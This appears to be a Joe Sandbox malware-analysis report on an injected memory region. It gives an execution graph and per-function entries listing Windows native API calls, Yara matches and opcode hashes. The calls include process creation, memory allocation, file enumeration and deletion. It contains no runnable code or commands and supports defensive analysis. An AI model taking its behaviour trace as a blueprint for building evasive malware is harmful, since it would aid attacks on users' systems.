                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                                          Signature Coverage:2.3%
                                                                                                                                                                                                          Total number of Nodes:443
                                                                                                                                                                                                          Total number of Limit Nodes:73
                                                                                                                                                                                                          execution_graph 95184 2c09400 95185 2c0940f 95184->95185 95186 2c09450 95185->95186 95187 2c0943d CreateThread 95185->95187 94803 2c1f5c0 94804 2c1f5dd 94803->94804 94807 2c141e0 94804->94807 94806 2c1f5fb 94808 2c14204 94807->94808 94809 2c14240 LdrLoadDll 94808->94809 94810 2c1420b 94808->94810 94809->94810 94810->94806 95188 2c1bc00 95190 2c1bc29 95188->95190 95189 2c1bd2d 95190->95189 95191 2c1bcd3 FindFirstFileW 95190->95191 95191->95189 95192 2c1bcee 95191->95192 95193 2c1bd14 FindNextFileW 95192->95193 95193->95192 95194 2c1bd26 FindClose 95193->95194 95194->95189 95195 2c16b80 95196 2c16b9c 95195->95196 95197 2c16bef 95195->95197 95196->95197 95198 2c27da0 NtClose 95196->95198 95200 2c16d18 95197->95200 95206 2c15f90 NtClose LdrInitializeThunk LdrInitializeThunk 95197->95206 95199 2c16bb7 95198->95199 95205 2c15f90 NtClose LdrInitializeThunk LdrInitializeThunk 95199->95205 95203 2c16cf2 95203->95200 95207 2c16160 NtClose LdrInitializeThunk LdrInitializeThunk 95203->95207 95205->95197 95206->95203 95207->95200 94811 2c27ac0 94812 2c27b6c 94811->94812 94814 2c27ae8 94811->94814 94813 2c27b82 NtCreateFile 94812->94813 94820 2c20bc0 94821 2c20bdc 94820->94821 94822 2c20c04 94821->94822 94823 2c20c18 94821->94823 94824 2c27da0 NtClose 94822->94824 94830 2c27da0 94823->94830 94826 2c20c0d 94824->94826 94827 2c20c21 94833 2c29da0 RtlAllocateHeap 94827->94833 94829 2c20c2c 94831 2c27dbd 94830->94831 94832 2c27dce NtClose 94831->94832 94832->94827 94833->94829 94834 2c2adc0 94837 2c29c80 94834->94837 94840 2c28110 94837->94840 94839 2c29c99 94841 2c2812a 94840->94841 94842 2c2813b RtlFreeHeap 94841->94842 94842->94839 95208 2c25a00 95209 2c25a5d 95208->95209 95210 2c25a88 95209->95210 95213 2c1fee0 95209->95213 95212 2c25a6a 95216 2c1fca0 95213->95216 95214 2c1fed0 95214->95212 95215 2c15e10 LdrInitializeThunk 95215->95216 95216->95214 95216->95215 95217 2c27880 LdrInitializeThunk 95216->95217 95218 2c27da0 NtClose 95216->95218 95217->95216 95218->95216 94843 2c155c2 94844 2c1554a 94843->94844 94849 2c155c5 94843->94849 94850 2c27420 94844->94850 94848 2c1556b 94851 2c2743d 94850->94851 94859 3452c0a 94851->94859 94852 2c15556 94854 2c27e40 94852->94854 94855 2c27ec1 94854->94855 94856 2c27e61 94854->94856 94862 3452e80 LdrInitializeThunk 94855->94862 94856->94848 94857 2c27ef2 94857->94848 94860 3452c11 94859->94860 94861 3452c1f LdrInitializeThunk 94859->94861 94860->94852 94861->94852 94862->94857 95219 2c12e0c 95220 2c17540 2 API calls 95219->95220 95221 2c12e1c 95220->95221 95222 2c27da0 NtClose 95221->95222 95223 2c12e31 95221->95223 95222->95223 95224 2c1a491 95225 2c1a464 95224->95225 95230 2c1a190 95225->95230 95227 2c1a46d 95244 2c19e30 95227->95244 95229 2c1a489 95231 2c1a1b5 95230->95231 95255 2c17b10 95231->95255 95234 2c1a2f2 95234->95227 95236 2c1a309 95236->95227 95237 2c1a300 95237->95236 95239 2c1a3f1 95237->95239 95270 2c19890 95237->95270 95241 2c1a449 95239->95241 95279 2c19bf0 95239->95279 95242 2c29c80 RtlFreeHeap 95241->95242 95243 2c1a450 95242->95243 95243->95227 95245 2c19e46 95244->95245 95253 2c19e51 95244->95253 95246 2c29d60 RtlAllocateHeap 95245->95246 95246->95253 95247 2c19e67 95247->95229 95248 2c17b10 GetFileAttributesW 95248->95253 95249 2c1a15e 95250 2c1a177 95249->95250 95251 2c29c80 RtlFreeHeap 95249->95251 95250->95229 95251->95250 95252 2c19890 RtlFreeHeap 95252->95253 95253->95247 95253->95248 95253->95249 95253->95252 95254 2c19bf0 RtlFreeHeap 95253->95254 95254->95253 95256 2c17b31 95255->95256 95257 2c17b38 GetFileAttributesW 95256->95257 95258 2c17b43 95256->95258 95257->95258 95258->95234 95259 2c22210 95258->95259 95260 2c2221e 95259->95260 95261 2c22225 95259->95261 95260->95237 95262 2c141e0 LdrLoadDll 95261->95262 95263 2c2225a 95262->95263 95264 2c22269 95263->95264 95283 2c21ce0 LdrLoadDll 95263->95283 95266 2c29d60 RtlAllocateHeap 95264->95266 95269 2c22401 95264->95269 95267 2c22282 95266->95267 95268 2c29c80 RtlFreeHeap 95267->95268 95267->95269 95268->95269 95269->95237 95271 2c198b6 95270->95271 95284 2c1d0d0 95271->95284 95273 2c1991d 95275 2c19aa0 95273->95275 95277 2c1993b 95273->95277 95274 2c19a85 95274->95237 95275->95274 95276 2c19750 RtlFreeHeap 95275->95276 95276->95275 95277->95274 95289 2c19750 95277->95289 95280 2c19c16 95279->95280 95281 2c1d0d0 RtlFreeHeap 95280->95281 95282 2c19c92 95281->95282 95282->95239 95283->95264 95286 2c1d0e6 95284->95286 95285 2c1d0f3 95285->95273 95286->95285 95287 2c29c80 RtlFreeHeap 95286->95287 95288 2c1d12c 95287->95288 95288->95273 95290 2c19766 95289->95290 95293 2c1d140 95290->95293 95292 2c1986c 95292->95277 95294 2c1d164 95293->95294 95295 2c1d1fc 95294->95295 95296 2c29c80 RtlFreeHeap 95294->95296 95295->95292 95296->95295 94863 2c16d50 94864 2c16dc2 94863->94864 94865 2c16d68 94863->94865 94865->94864 94867 2c1a960 94865->94867 94868 2c1a986 94867->94868 94869 2c1aba5 94868->94869 94894 2c281a0 94868->94894 94869->94864 94871 2c1a9fc 94871->94869 94897 2c2ae90 94871->94897 94873 2c1aa18 94873->94869 94874 2c1aae9 94873->94874 94876 2c27420 LdrInitializeThunk 94873->94876 94875 2c1ab08 94874->94875 94877 2c15410 LdrInitializeThunk 94874->94877 94882 2c1ab8d 94875->94882 94910 2c26ff0 94875->94910 94878 2c1aa74 94876->94878 94877->94875 94878->94874 94879 2c1aa7d 94878->94879 94879->94869 94881 2c1aaaf 94879->94881 94889 2c1aad1 94879->94889 94903 2c15410 94879->94903 94925 2c235e0 LdrInitializeThunk 94881->94925 94885 2c178c0 LdrInitializeThunk 94882->94885 94890 2c1ab9b 94885->94890 94888 2c1ab64 94915 2c27090 94888->94915 94906 2c178c0 94889->94906 94890->94864 94892 2c1ab7e 94920 2c271d0 94892->94920 94895 2c281bd 94894->94895 94896 2c281ce CreateProcessInternalW 94895->94896 94896->94871 94898 2c2ae00 94897->94898 94899 2c2ae5d 94898->94899 94926 2c29d60 94898->94926 94899->94873 94901 2c2ae3a 94902 2c29c80 RtlFreeHeap 94901->94902 94902->94899 94905 2c1544e 94903->94905 94932 2c275e0 94903->94932 94905->94881 94907 2c178d3 94906->94907 94938 2c27330 94907->94938 94909 2c178fe 94909->94864 94911 2c27062 94910->94911 94913 2c27014 94910->94913 94944 34539b0 LdrInitializeThunk 94911->94944 94912 2c27087 94912->94888 94913->94888 94916 2c270b1 94915->94916 94917 2c270ff 94915->94917 94916->94892 94945 3454340 LdrInitializeThunk 94917->94945 94918 2c27124 94918->94892 94921 2c27242 94920->94921 94922 2c271f4 94920->94922 94946 3452fb0 LdrInitializeThunk 94921->94946 94922->94882 94923 2c27267 94923->94882 94925->94889 94929 2c280c0 94926->94929 94928 2c29d7b 94928->94901 94930 2c280dd 94929->94930 94931 2c280ee RtlAllocateHeap 94930->94931 94931->94928 94933 2c2767f 94932->94933 94935 2c27601 94932->94935 94937 3452d10 LdrInitializeThunk 94933->94937 94934 2c276c4 94934->94905 94935->94905 94937->94934 94939 2c273a3 94938->94939 94941 2c27354 94938->94941 94943 3452dd0 LdrInitializeThunk 94939->94943 94940 2c273c8 94940->94909 94941->94909 94943->94940 94944->94912 94945->94918 94946->94923 95297 2c15490 95298 2c178c0 LdrInitializeThunk 95297->95298 95301 2c154c0 95297->95301 95298->95301 95300 2c154ec 95301->95300 95302 2c17840 95301->95302 95303 2c17884 95302->95303 95308 2c178a5 95303->95308 95309 2c27130 95303->95309 95305 2c178b1 95305->95301 95306 2c17895 95306->95305 95307 2c27da0 NtClose 95306->95307 95307->95308 95308->95301 95310 2c2719f 95309->95310 95311 2c27151 95309->95311 95314 3454650 LdrInitializeThunk 95310->95314 95311->95306 95312 2c271c4 95312->95306 95314->95312 94952 2c273d0 94953 2c273ed 94952->94953 94956 3452df0 LdrInitializeThunk 94953->94956 94954 2c27415 94956->94954 94962 2c20f50 94967 2c20f5f 94962->94967 94963 2c20fe3 94964 2c20fa3 94965 2c29c80 RtlFreeHeap 94964->94965 94966 2c20fb0 94965->94966 94967->94963 94967->94964 94968 2c20fde 94967->94968 94969 2c29c80 RtlFreeHeap 94968->94969 94969->94963 95315 2c27d10 95316 2c27d79 95315->95316 95318 2c27d31 95315->95318 95317 2c27d8f NtDeleteFile 95316->95317 94970 3452ad0 LdrInitializeThunk 94971 2c09460 94972 2c09942 94971->94972 94974 2c09ef8 94972->94974 94975 2c29920 94972->94975 94976 2c29943 94975->94976 94981 2c03db0 94976->94981 94978 2c2994f 94979 2c2997d 94978->94979 94984 2c243e0 94978->94984 94979->94974 94988 2c12f10 94981->94988 94983 2c03dbd 94983->94978 94985 2c2443a 94984->94985 94987 2c24447 94985->94987 94999 2c113a0 94985->94999 94987->94979 94989 2c12f27 94988->94989 94991 2c12f40 94989->94991 94992 2c28800 94989->94992 94991->94983 94993 2c28818 94992->94993 94994 2c2883c 94993->94994 94995 2c28891 94993->94995 94996 2c27420 LdrInitializeThunk 94993->94996 94994->94991 94997 2c29c80 RtlFreeHeap 94995->94997 94996->94995 94998 2c288a6 94997->94998 94998->94991 95000 2c113db 94999->95000 95015 2c17650 95000->95015 95002 2c113e3 95003 2c29d60 RtlAllocateHeap 95002->95003 95013 2c116b2 95002->95013 95004 2c113f9 95003->95004 95005 2c29d60 RtlAllocateHeap 95004->95005 95006 2c1140a 95005->95006 95007 2c29d60 RtlAllocateHeap 95006->95007 95008 2c1141b 95007->95008 95014 2c114ae 95008->95014 95030 2c16460 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95008->95030 95010 2c141e0 LdrLoadDll 95011 2c1166f 95010->95011 95026 2c26b00 95011->95026 95013->94987 95014->95010 95016 2c1767c 95015->95016 95031 2c17540 95016->95031 95019 2c176c1 95021 2c176dd 95019->95021 95024 2c27da0 NtClose 95019->95024 95020 2c176a9 95022 2c176b4 95020->95022 95023 2c27da0 NtClose 95020->95023 95021->95002 95022->95002 95023->95022 95025 2c176d3 95024->95025 95025->95002 95027 2c26b5a 95026->95027 95029 2c26b67 95027->95029 95042 2c116d0 95027->95042 95029->95013 95030->95014 95032 2c1755a 95031->95032 95036 2c17636 95031->95036 95037 2c274c0 95032->95037 95035 2c27da0 NtClose 95035->95036 95036->95019 95036->95020 95038 2c274dd 95037->95038 95041 34535c0 LdrInitializeThunk 95038->95041 95039 2c1762a 95039->95035 95041->95039 95045 2c116f0 95042->95045 95058 2c17920 95042->95058 95044 2c11bd5 95044->95029 95045->95044 95062 2c20580 95045->95062 95048 2c118f1 95049 2c2ae90 2 API calls 95048->95049 95052 2c11906 95049->95052 95050 2c1174e 95050->95044 95065 2c2ad60 95050->95065 95051 2c178c0 LdrInitializeThunk 95054 2c11931 95051->95054 95052->95054 95070 2c10360 95052->95070 95054->95044 95054->95051 95055 2c10360 LdrInitializeThunk 95054->95055 95055->95054 95056 2c11a5f 95056->95054 95057 2c178c0 LdrInitializeThunk 95056->95057 95057->95056 95059 2c1792d 95058->95059 95060 2c17955 95059->95060 95061 2c1794e SetErrorMode 95059->95061 95060->95045 95061->95060 95074 2c29bf0 95062->95074 95064 2c205a1 95064->95050 95066 2c2ad70 95065->95066 95067 2c2ad76 95065->95067 95066->95048 95068 2c29d60 RtlAllocateHeap 95067->95068 95069 2c2ad9c 95068->95069 95069->95048 95071 2c1037c 95070->95071 95081 2c28020 95071->95081 95077 2c27f00 95074->95077 95076 2c29c21 95076->95064 95078 2c27f8a 95077->95078 95080 2c27f24 95077->95080 95079 2c27fa0 NtAllocateVirtualMemory 95078->95079 95079->95076 95080->95076 95082 2c2803a 95081->95082 95085 3452c70 LdrInitializeThunk 95082->95085 95083 2c10382 95083->95056 95085->95083 95319 2c0b1a0 95320 2c29bf0 NtAllocateVirtualMemory 95319->95320 95321 2c0c811 95319->95321 95320->95321 95086 2c1ece0 95087 2c1ed44 95086->95087 95115 2c15d00 95087->95115 95089 2c1ee74 95090 2c1ee6d 95090->95089 95122 2c15e10 95090->95122 95092 2c1f013 95093 2c1eef0 95093->95092 95094 2c1f022 95093->95094 95126 2c1eac0 95093->95126 95095 2c27da0 NtClose 95094->95095 95097 2c1f02c 95095->95097 95098 2c1ef25 95098->95094 95099 2c1ef30 95098->95099 95100 2c29d60 RtlAllocateHeap 95099->95100 95101 2c1ef59 95100->95101 95102 2c1ef62 95101->95102 95103 2c1ef78 95101->95103 95104 2c27da0 NtClose 95102->95104 95135 2c1e9b0 CoInitialize 95103->95135 95106 2c1ef6c 95104->95106 95107 2c1ef86 95137 2c27880 95107->95137 95109 2c1f002 95110 2c27da0 NtClose 95109->95110 95111 2c1f00c 95110->95111 95112 2c29c80 RtlFreeHeap 95111->95112 95112->95092 95113 2c1efa4 95113->95109 95114 2c27880 LdrInitializeThunk 95113->95114 95114->95113 95116 2c15d33 95115->95116 95117 2c15d57 95116->95117 95141 2c27930 95116->95141 95117->95090 95119 2c15d7a 95119->95117 95120 2c27da0 NtClose 95119->95120 95121 2c15dfa 95120->95121 95121->95090 95123 2c15e35 95122->95123 95146 2c27710 95123->95146 95127 2c1eadc 95126->95127 95128 2c141e0 LdrLoadDll 95127->95128 95130 2c1eafa 95128->95130 95129 2c1eb03 95129->95098 95130->95129 95131 2c141e0 LdrLoadDll 95130->95131 95132 2c1ebce 95131->95132 95133 2c141e0 LdrLoadDll 95132->95133 95134 2c1ec28 95132->95134 95133->95134 95134->95098 95136 2c1ea15 95135->95136 95136->95107 95138 2c2789d 95137->95138 95151 3452ba0 LdrInitializeThunk 95138->95151 95139 2c278cd 95139->95113 95142 2c2794a 95141->95142 95145 3452ca0 LdrInitializeThunk 95142->95145 95143 2c27976 95143->95119 95145->95143 95147 2c2772a 95146->95147 95150 3452c60 LdrInitializeThunk 95147->95150 95148 2c15ea9 95148->95093 95150->95148 95151->95139 95152 2c107e0 95153 2c107fa 95152->95153 95154 2c141e0 LdrLoadDll 95153->95154 95155 2c10818 95154->95155 95156 2c1085d 95155->95156 95157 2c1084c PostThreadMessageW 95155->95157 95157->95156 95322 2c27c20 95323 2c27cbc 95322->95323 95325 2c27c44 95322->95325 95324 2c27cd2 NtReadFile 95323->95324 95326 2c24da0 95327 2c24dfa 95326->95327 95329 2c24e07 95327->95329 95330 2c22930 95327->95330 95331 2c29bf0 NtAllocateVirtualMemory 95330->95331 95332 2c22971 95331->95332 95333 2c141e0 LdrLoadDll 95332->95333 95335 2c22a76 95332->95335 95336 2c229b7 95333->95336 95334 2c229f0 Sleep 95334->95336 95335->95329 95336->95334 95336->95335 95160 2c17f71 95161 2c17ef2 95160->95161 95162 2c17f76 95160->95162 95162->95161 95164 2c169d0 LdrInitializeThunk LdrInitializeThunk 95162->95164 95164->95161 95165 2c16df0 95166 2c16db4 95165->95166 95167 2c16df7 95165->95167 95168 2c1a960 9 API calls 95166->95168 95169 2c16dc2 95168->95169 95337 2c167b0 95338 2c167da 95337->95338 95341 2c176f0 95338->95341 95340 2c16804 95342 2c1770d 95341->95342 95348 2c27510 95342->95348 95344 2c1775d 95345 2c17764 95344->95345 95346 2c275e0 LdrInitializeThunk 95344->95346 95345->95340 95347 2c1778d 95346->95347 95347->95340 95349 2c27531 95348->95349 95350 2c2759d 95348->95350 95349->95344 95353 3452f30 LdrInitializeThunk 95350->95353 95351 2c275d6 95351->95344 95353->95351 95170 2c27270 95171 2c272f4 95170->95171 95172 2c27294 95170->95172 95175 3452ee0 LdrInitializeThunk 95171->95175 95173 2c27325 95175->95173 95177 2c12477 95178 2c15d00 2 API calls 95177->95178 95179 2c124a3 95178->95179 95180 2c1937b 95181 2c1938a 95180->95181 95182 2c19391 95181->95182 95183 2c29c80 RtlFreeHeap 95181->95183 95183->95182

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 02C09460 Relevance: 50.5, Strings: 40, Instructions: 489COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 26 2c09460-2c09938 27 2c09942-2c09946 26->27 28 2c09948-2c0996d 27->28 29 2c0996f-2c09979 27->29 28->27 30 2c0998a-2c09996 29->30 31 2c09998-2c099a1 30->31 32 2c099ae-2c099b5 30->32 35 2c099a3-2c099a6 31->35 36 2c099ac 31->36 33 2c099e7-2c099ee 32->33 34 2c099b7-2c099e5 32->34 38 2c09a20-2c09a27 33->38 39 2c099f0-2c09a1e 33->39 34->32 35->36 36->30 40 2c09a59-2c09aaa 38->40 41 2c09a29-2c09a57 38->41 39->33 42 2c09abb-2c09ac4 40->42 41->38 43 2c09ad4-2c09ad8 42->43 44 2c09ac6-2c09ad2 42->44 45 2c09ae4-2c09aee 43->45 46 2c09ada-2c09ae1 43->46 44->42 48 2c09aff-2c09b08 45->48 46->45 49 2c09b0a-2c09b1c 48->49 50 2c09b1e-2c09b28 48->50 49->48 51 2c09b39-2c09b45 50->51 53 2c09b47-2c09b59 51->53 54 2c09b5b-2c09b65 51->54 53->51 55 2c09b76-2c09b82 54->55 57 2c09b94-2c09b9e 55->57 58 2c09b84-2c09b8a 55->58 61 2c09baf-2c09bbb 57->61 59 2c09b92 58->59 60 2c09b8c-2c09b8f 58->60 59->55 60->59 63 2c09bd1-2c09be4 61->63 64 2c09bbd-2c09bcf 61->64 65 2c09beb-2c09bf4 63->65 64->61 67 2c09e31-2c09e38 65->67 68 2c09bfa-2c09c04 65->68 70 2c09f32-2c09f3c 67->70 71 2c09e3e-2c09e48 67->71 69 2c09c15-2c09c21 68->69 72 2c09c23-2c09c2c 69->72 73 2c09c39-2c09c40 69->73 74 2c09e59-2c09e65 71->74 75 2c09c37 72->75 76 2c09c2e-2c09c31 72->76 77 2c09c61-2c09c6b 73->77 78 2c09c42-2c09c5f 73->78 79 2c09e67-2c09e7a 74->79 80 2c09e7c-2c09e86 74->80 75->69 76->75 82 2c09c7c-2c09c88 77->82 78->73 79->74 84 2c09e97-2c09ea0 80->84 85 2c09ca6-2c09cbf 82->85 86 2c09c8a-2c09c96 82->86 87 2c09ea2-2c09eb4 84->87 88 2c09eb6-2c09ec0 84->88 85->85 92 2c09cc1-2c09cd4 85->92 90 2c09ca4 86->90 91 2c09c98-2c09c9e 86->91 87->84 93 2c09ed1-2c09edd 88->93 90->82 91->90 94 2c09ce5-2c09cf1 92->94 95 2c09ef3 call 2c29920 93->95 96 2c09edf-2c09ef1 93->96 99 2c09d01-2c09d08 94->99 100 2c09cf3-2c09cff 94->100 103 2c09ef8-2c09f02 95->103 98 2c09ec2-2c09ecb 96->98 98->93 104 2c09d0a-2c09d3d 99->104 105 2c09d3f-2c09d4e 99->105 100->94 106 2c09f13-2c09f1c 103->106 104->99 107 2c09d50-2c09d57 105->107 108 2c09dca-2c09dde 105->108 106->70 111 2c09f1e-2c09f30 106->111 109 2c09d59-2c09d8c 107->109 110 2c09d8e-2c09d98 107->110 112 2c09def-2c09dfb 108->112 109->107 116 2c09da9-2c09db2 110->116 111->106 113 2c09e19-2c09e2c 112->113 114 2c09dfd-2c09e09 112->114 113->65 117 2c09e17 114->117 118 2c09e0b-2c09e11 114->118 119 2c09db4-2c09dc6 116->119 120 2c09dc8 116->120 117->112 118->117 119->116 120->67
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: L$!e$'$)~$*z$.,$0$3$6$7$8=$:$:^$?$C$ExK$I%$My$O$P5$V$Z$\$^^$b$c$h*$n$nr$r6$s|$t$x$z}$|#$}:$1$B$K$X
                                                                                                                                                                                                          • API String ID: 0-580166099
                                                                                                                                                                                                          • Opcode ID: 84956fa25fbd526bcff2ace8aa58ce7ff2863ea4e3ca17b2e7c2ba4531c05971
                                                                                                                                                                                                          • Instruction ID: 81bfcb972330a34ee67664f551cf722b065bd33d816afbc649a69ce77813a394
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84956fa25fbd526bcff2ace8aa58ce7ff2863ea4e3ca17b2e7c2ba4531c05971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D452A9B0D05669CBEB24CF45C998BDDBBB2BB85308F1081D9C10D6B291D7B91AC9CF81
                                                                                                                                                                                                          Function 02C1BC00 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C1BCE4
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02C1BD1F
                                                                                                                                                                                                          • FindClose.KERNELBASE(?), ref: 02C1BD2A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                                                                          • Opcode ID: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                                                                                          • Instruction ID: 8bab3e18b1bc4bdf3a8aa863d789065b06a5d0d92e8e462182cea5281c1eb890
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC3172B19006487BDB20EF60CC85FFF777CDB85708F144498B949A7184DBB0AA84AFA0
                                                                                                                                                                                                          Function 02C27AC0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02C27BB3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                                                                                                                                                                                                          • Instruction ID: 7e8a7ed0eddccd9d703d1141351e89ee133208c21b86af8b79a546e09f2abbc8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6331EEB5A00658AFCB14DF98D880EEEB7F9EF8C714F108219F919A7344D770A8058FA5
                                                                                                                                                                                                          Function 02C27C20 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02C27CFB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                                                                                          • Instruction ID: ae578309f9fb3a9de934ba15ac4199ea3e68683d4aea0bd355dbbc4363174a41
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8431E3B5A00618AFDB14DF99D880EEFB7F9EF88314F108219F909A7344D774A8158FA5
                                                                                                                                                                                                          Function 02C27F00 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(02C1174E,?,02C26B67,00000000,00000004,00003000,?,?,?,?,?,02C26B67,02C1174E,02C29C21,02C26B67,104D8B00), ref: 02C27FBD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                                                          • Opcode ID: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                                                                                          • Instruction ID: 4bffd4dea8962f448e635bd660e0589b65fcd57d3284df10b38be3164bbee175
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F32127B5A00659AFDB10DF98DC80FAFB7A9EF88300F108209FD09A7244D774A8158FA1
                                                                                                                                                                                                          Function 02C27D10 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DeleteFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4033686569-0
                                                                                                                                                                                                          • Opcode ID: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                                                                                                                                                                                                          • Instruction ID: 02a6f834b224f31ae4d91fce272497ddb8a28c0f7bdd23dc5b619463a57bd8a3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC01C475A006247FD610EBA4DC41FFBB3ADDF85714F404109FA09AB184DBB479088BE1
                                                                                                                                                                                                          Function 02C27DA0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C27DD7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                                                          • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                                                                                          • Instruction ID: 0a0c3d1cfc510104a0d5f995996d0ae5ca1476846f7c6b2c08b4d6646e3f7609
